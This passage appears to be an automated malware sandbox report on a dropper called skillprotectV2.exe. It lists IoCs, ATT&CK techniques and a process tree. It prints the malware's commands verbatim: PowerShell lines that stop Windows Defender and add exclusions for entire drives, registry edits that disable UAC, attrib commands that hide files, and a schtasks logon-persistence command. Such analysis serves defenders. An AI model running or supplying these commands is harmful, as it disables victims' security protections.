Token: SeDebugPrivilege	1672	powershell.exe
Token: SeDebugPrivilege	1288	powershell.exe
Token: SeDebugPrivilege	3056	powershell.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
5004	Start.exe
1680	CustomJavaSC.exe
4140	sihost.exe
4604	Aida32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1520 wrote to memory of 2588	1520	skillprotectV2.exe	78
PID 1520 wrote to memory of 2588	1520	skillprotectV2.exe	78
PID 1520 wrote to memory of 2588	1520	skillprotectV2.exe	78
PID 1520 wrote to memory of 5004	1520	skillprotectV2.exe	81
PID 1520 wrote to memory of 5004	1520	skillprotectV2.exe	81
PID 5004 wrote to memory of 2716	5004	Start.exe	82
PID 5004 wrote to memory of 2716	5004	Start.exe	82
PID 5004 wrote to memory of 3344	5004	Start.exe	84
PID 5004 wrote to memory of 3344	5004	Start.exe	84
PID 5004 wrote to memory of 4960	5004	Start.exe	86
PID 5004 wrote to memory of 4960	5004	Start.exe	86
PID 5004 wrote to memory of 5032	5004	Start.exe	88
PID 5004 wrote to memory of 5032	5004	Start.exe	88
PID 5004 wrote to memory of 2348	5004	Start.exe	90
PID 5004 wrote to memory of 2348	5004	Start.exe	90
PID 5004 wrote to memory of 2328	5004	Start.exe	92
PID 5004 wrote to memory of 2328	5004	Start.exe	92
PID 5004 wrote to memory of 388	5004	Start.exe	94
PID 5004 wrote to memory of 388	5004	Start.exe	94
PID 5004 wrote to memory of 3232	5004	Start.exe	96
PID 5004 wrote to memory of 3232	5004	Start.exe	96
PID 5004 wrote to memory of 5024	5004	Start.exe	98
PID 5004 wrote to memory of 5024	5004	Start.exe	98
PID 5004 wrote to memory of 568	5004	Start.exe	100
PID 5004 wrote to memory of 568	5004	Start.exe	100
PID 5004 wrote to memory of 940	5004	Start.exe	102
PID 5004 wrote to memory of 940	5004	Start.exe	102
PID 5004 wrote to memory of 1520	5004	Start.exe	104
PID 5004 wrote to memory of 1520	5004	Start.exe	104
PID 5004 wrote to memory of 2392	5004	Start.exe	106
PID 5004 wrote to memory of 2392	5004	Start.exe	106
PID 5004 wrote to memory of 1684	5004	Start.exe	108
PID 5004 wrote to memory of 1684	5004	Start.exe	108
PID 5004 wrote to memory of 964	5004	Start.exe	110
PID 5004 wrote to memory of 964	5004	Start.exe	110
PID 5004 wrote to memory of 2864	5004	Start.exe	112
PID 5004 wrote to memory of 2864	5004	Start.exe	112
PID 5004 wrote to memory of 2704	5004	Start.exe	114
PID 5004 wrote to memory of 2704	5004	Start.exe	114
PID 5004 wrote to memory of 4292	5004	Start.exe	116
PID 5004 wrote to memory of 4292	5004	Start.exe	116
PID 5004 wrote to memory of 1872	5004	Start.exe	118
PID 5004 wrote to memory of 1872	5004	Start.exe	118
PID 5004 wrote to memory of 1528	5004	Start.exe	120
PID 5004 wrote to memory of 1528	5004	Start.exe	120
PID 5004 wrote to memory of 132	5004	Start.exe	122
PID 5004 wrote to memory of 132	5004	Start.exe	122
PID 5004 wrote to memory of 1372	5004	Start.exe	124
PID 5004 wrote to memory of 1372	5004	Start.exe	124
PID 5004 wrote to memory of 2648	5004	Start.exe	126
PID 5004 wrote to memory of 2648	5004	Start.exe	126
PID 5004 wrote to memory of 1540	5004	Start.exe	128
PID 5004 wrote to memory of 1540	5004	Start.exe	128
PID 5004 wrote to memory of 3324	5004	Start.exe	130
PID 5004 wrote to memory of 3324	5004	Start.exe	130
PID 5004 wrote to memory of 996	5004	Start.exe	132
PID 5004 wrote to memory of 996	5004	Start.exe	132
PID 5004 wrote to memory of 4272	5004	Start.exe	134
PID 5004 wrote to memory of 4272	5004	Start.exe	134
PID 5004 wrote to memory of 728	5004	Start.exe	136
PID 5004 wrote to memory of 728	5004	Start.exe	136
PID 5004 wrote to memory of 4104	5004	Start.exe	138
PID 5004 wrote to memory of 4104	5004	Start.exe	138
PID 5004 wrote to memory of 3228	5004	Start.exe	140

System policy modification 1 TTPs 6 IoCs

defense_evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	SteamWebClient.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	SteamWebClient.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	SteamWebClient.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2252	attrib.exe
956	attrib.exe

C:\Users\Admin\AppData\Local\Temp\skillprotectV2.exe
"C:\Users\Admin\AppData\Local\Temp\skillprotectV2.exe"
1⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1520
- C:\SkillProtect\SkillProtectV2.exe
  "C:\SkillProtect\SkillProtectV2.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2588
- C:\Program Files\WindowsBootLoad\Start.exe
  "C:\Program Files\WindowsBootLoad\Start.exe"
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Modifies Windows Defender TamperProtection settings
  - Windows security bypass
  - Executes dropped EXE
  - Windows security modification
  - Adds Run key to start application
  - Modifies WinLogon
  - Drops file in Program Files directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:5004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Stop-Service WinDefend -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2716
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-Service WinDefend -StartupType Disabled" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3344
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4960
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend' -Name 'Start' -Value 4 -PropertyType DWord -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5032
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2348
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Windows' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2328
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Program Files' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:388
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3232
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Users' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5024
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\SkillProtect' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:568
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:940
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -DisableBehaviorMonitoring $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1520
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -DisableBlockAtFirstSeen $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2392
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -DisableIOAVProtection $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1684
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -DisablePrivacyMode $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:964
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2864
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -DisableArchiveScanning $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2704
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -DisableScriptScanning $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1872
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -SubmitSamplesConsent 2 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1528
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -MAPSReporting 0 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:132
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -HighThreatDefaultAction 6 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1372
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2648
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -LowThreatDefaultAction 6 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1540
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -SevereThreatDefaultAction 6 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3324
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -EnableControlledFolderAccess Disabled -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:996
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4272
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Windows' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:728
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Program Files' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4104
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3228
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Users' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:388
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\SkillProtect' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2912
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:3176
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -DisableBehaviorMonitoring $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:2316
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -DisableBlockAtFirstSeen $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:2916
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -DisableIOAVProtection $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:2248
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -DisablePrivacyMode $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:2164
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:4076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -DisableArchiveScanning $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:1412
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:2760
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -DisableScriptScanning $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:3408
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -SubmitSamplesConsent 2 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:4292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -MAPSReporting 0 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:700
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -HighThreatDefaultAction 6 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:1176
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:2744
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -LowThreatDefaultAction 6 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:2688
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -SevereThreatDefaultAction 6 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:3424
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Set-MpPreference -EnableControlledFolderAccess Disabled -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:4428
- - C:\Program Files\WinRar\RarExtPackage.exe
    "C:\Program Files\WinRar\RarExtPackage.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4240
  - - C:\Windows\System32\attrib.exe
      "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\MsMpEng"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2252
  - - C:\Windows\System32\attrib.exe
      "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\MsMpEng\$77MsMpEng.exe.exe"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:956
- - C:\Program Files\Java\CustomJavaSC.exe
    "C:\Program Files\Java\CustomJavaSC.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1680
  - - C:\Users\Admin\AppData\Roaming\AidaAV\Aida32.exe
      "C:\Users\Admin\AppData\Roaming\AidaAV\Aida32.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      Suspicious use of SetWindowsHookEx
      PID:4604
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious use of AdjustPrivilegeToken
        
        PID:3640
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "systemh.exe" /tr '"C:\Users\Admin\AppData\Roaming\systemh.exe.exe"' & exit
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2292
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "systemh.exe" /tr '"C:\Users\Admin\AppData\Roaming\systemh.exe.exe"'
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1032
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        5⤵
        
        PID:1764
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1864
- - C:\Program Files\RUXIM\sihost.exe
    "C:\Program Files\RUXIM\sihost.exe"
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:4140
  - - C:\Users\Admin\AppData\Roaming\Steam\SteamWebHelper.exe
      "C:\Users\Admin\AppData\Roaming\Steam\SteamWebHelper.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1412
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Steam\JdNzo6aXzPz4ZVLaHlpQ.vbe"
      4⤵
      PID:408
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Steam\1964hQskJhjU.bat" "
        5⤵
        
        PID:3404
      - C:\Users\Admin\AppData\Roaming\Steam\SteamWebClient.exe
        
        "C:\Users\Admin\AppData\Roaming\Steam\SteamWebClient.exe"
        6⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:3616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1288
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        7⤵
        
        PID:4916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1680
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2304
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        7⤵
        
        PID:4064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:244
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/SkillProtect/'
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1672
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:780
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3592
        
        C:\Program Files\Google\Chrome\Application\sppsvc.exe
        
        "C:\Program Files\Google\Chrome\Application\sppsvc.exe"
        7⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Modifies registry class
        System policy modification
        
        PID:3528
        
        C:\Windows\System32\WScript.exe
        
